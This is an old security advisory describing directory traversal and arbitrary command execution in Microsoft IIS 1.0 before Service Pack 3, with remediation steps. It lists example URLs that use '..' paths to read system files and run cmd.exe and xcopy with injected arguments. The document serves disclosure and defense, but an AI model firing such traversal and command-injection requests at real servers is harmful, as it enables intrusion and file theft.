----------------------------------------------------------------------------

Service

http

Program

Microsoft Internet-Information-Server/1.0 prior to service pack 3

Problem

The server allows access to execute arbitrary programs and retrieve files
outside of the document tree.

Impact

Internet users can take control of the machine.

Timeliness

A series of bugs and vulnerabilites have become widely known 28th February
1996.

Description

It is possible to retrieve files and execute commands outside of the
intended wwwroot tree by including '..' in the document pathanmes. In the
following example urls, a directory tree is envisaged where IIS is installed
in c:\inetsrv, and NT is installed in c:\winnt35

http://your.host.name/scripts/anyold.cmd?&dir+c:\
http://your.host.name/scripts/anyold.bat?&dir+c:\
http://your.host.name/..\..\autoexec.bat
http://your.host.name/scripts/../../../winnt35/win.ini
http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+set
http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+echo+"Hi There"+>c:\temp\hello.txt
http://your.host.name/scripts/..\..\WINNT35\SYSTEM32\XCOPY.EXE?+c:\autoexec.bat+c:\temp

Recommendations

   * Obtain & install Service Pack 3.
   * Put the wwwroot and scripts on seperate partitions
   * Disable file mappings for .bat and .cmd

